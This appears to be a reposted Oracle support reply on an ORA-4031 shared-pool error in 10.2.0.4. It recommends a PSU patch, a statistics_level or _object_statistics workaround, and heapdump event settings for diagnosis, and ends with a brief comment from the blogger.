Trace file shows indeed a high size for the ‘obj stat memo’ component but also some imbalance between the subpools.

Bug 5573238 is not an issue here as fixed as from 10.2.0.4 but the workaround can be used here as well. So, setting
“statistics_level”=basic or “_object_statistics”=false should also workaround this issue.

The imbalance of the subpools on the other hand might be caused by bug 6271590 which is fixed as from PSU patch
10.2.0.4.2.

I would suggest to apply the latest PSU patch available right now and that is 10.2.0.4.4.

For the ‘obj stat memo’ issue, you have to choose between further investigating the issue or using the workaround by
setting “statistics_level”=basic or “_object_statistics”=false.

If you want to further investigate the issue, we will need a more detailed heapdump of the ORA-4031.

To Do:
1. Apply PSU patch 10.2.0.4.4 (patch 9352164) on top of patchset 10.2.0.4

2. Regarding the ‘obj stat memo’ issue:

a) Workaround the issue by setting “statistics_level”=basic or “_object_statistics”=false
+
Bounce the instance

-OR-

b) Further investigate the issue:

Set following parameters in the init.ora file (SPFILE/PFILE):
SQL> alter system set max_dump_file_size = unlimited scope=spfile;
SQL> alter system set events ‘4031 trace name heapdump level 536870914’ scope=spfile;

Bounce the instance

Once the ORA-4031 reoccurs, provide alert+trace file

So imbalance between subpool can be fixed , and will reduce the likelihood of  4031 occurrence. But we  can never flush huge memory used by “obj stat memory”,i think it’s awful .

沪ICP备14014813号

沪公网安备 31010802001379号